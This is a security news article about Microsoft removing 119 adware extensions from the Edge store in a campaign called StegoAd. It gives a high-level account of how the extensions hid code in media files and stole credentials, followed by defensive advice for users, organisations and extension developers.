MICROSOFT has removed 119 malicious browser extensions from its Edge add‑on store after discovering they were part of a long‑running adware campaign dubbed StegoAd. The extensions first appeared in the store in mid‑2024 and remained available until the recent takedown in June 2026. They masqueraded as useful tools such as ad blockers, virtual private networks and productivity helpers which attracted more than 2.6 million installs. The scale of the distribution shows how attackers can abuse trusted marketplaces to reach a broad user base. Security teams warn that the presence of such malware in official channels undermines confidence in browser add‑on ecosystems.
Analysis of the offending extensions showed that the malicious payload was hidden inside ordinary image and font files using steganographic methods which allowed the code to bypass simple file‑based scanners. The embedded JavaScript remained inert in most installations and only executed when a specific trigger, such as a visit to a predefined domain, was met. This selective activation reduced the likelihood of detection during routine security reviews. Researchers noted that the obfuscation technique varied slightly between different versions of the extensions, complicating signature‑based detection. No CVE identifiers have been published for the underlying weakness because the abuse relied on legitimate browser features rather than a software flaw.
When the payload activated, it began harvesting usernames and passwords from login forms and intercepted one‑time codes used for two‑factor authentication while simultaneously injecting fraudulent advertisements into legitimate web pages. The injected ads mimicked genuine banners from major platforms such as Google Shopping and Amazon Marketplace, generating revenue for the operators through pay‑per‑click schemes. At the same time, stolen credentials were used to access accounts, change settings and propagate further malicious extensions. The dual approach of ad fraud and account takeover allowed the campaign to persist for roughly two years before being noticed. Victims often remained unaware of the compromise until they noticed unexpected charges or login alerts.
Microsoft’s removal of the extensions halted the immediate threat, but investigators have not identified a specific threat actor behind the StegoAd infrastructure. The operation displayed a clear ability to evolve its tactics, altering the steganographic concealment and the trigger conditions across multiple releases. This adaptability mirrors trends seen in other long‑lived adware and malware distribution efforts that target browser extensions.
Security observers note that the lack of a clear attribution highlights the lesson that trust in official repositories can be exploited. The case underscores the need for continuous vetting of add‑ons even after they have been approved for distribution.
Users should begin by opening the Edge extensions page and reviewing each entry for unfamiliar names or unexpected permissions. Any add‑on that cannot be traced to a known developer or that was installed without a deliberate click should be disabled and removed immediately. Turning on the setting that requires administrator approval before new extensions are added can prevent similar installations in the future.
Monitoring network traffic for repeated connections to unfamiliar advertising domains or to IP addresses with poor reputation can help spot the covert callbacks used by the malware. Enabling logging of extension activity and regularly reviewing those logs provides an additional layer of visibility.
Organisations are encouraged to enforce application control policies that limit installations to extensions signed by verified publishers and to maintain an approved list that is reviewed quarterly. Endpoint protection platforms should be updated with detection rules that look for obfuscated JavaScript embedded in media files, a technique commonly used in steganographic campaigns.
Developers who distribute extensions ought to sign their packages with a trusted certificate and publish a clear changelog so users can verify authenticity. Training staff to recognise excessive permission requests and to report suspicious add‑ons reduces the chance of successful social engineering. Regular audits of browser configurations across managed devices help ensure that unauthorised extensions do not remain hidden.
Staying informed about emerging threats through reputable security advisories and sharing indicators of compromise within trusted information‑sharing groups remains essential. Because the StegoAd campaign relied on stealth rather than a traditional vulnerability, defensive strategies must focus on behaviour‑based detection and user awareness. Maintaining current versions of the browser and of all installed extensions limits the window of opportunity for attackers to exploit outdated components.
By combining technical controls with vigilant practises, both individuals and organisations can reduce the likelihood of falling victim to similar stealthy adware operations.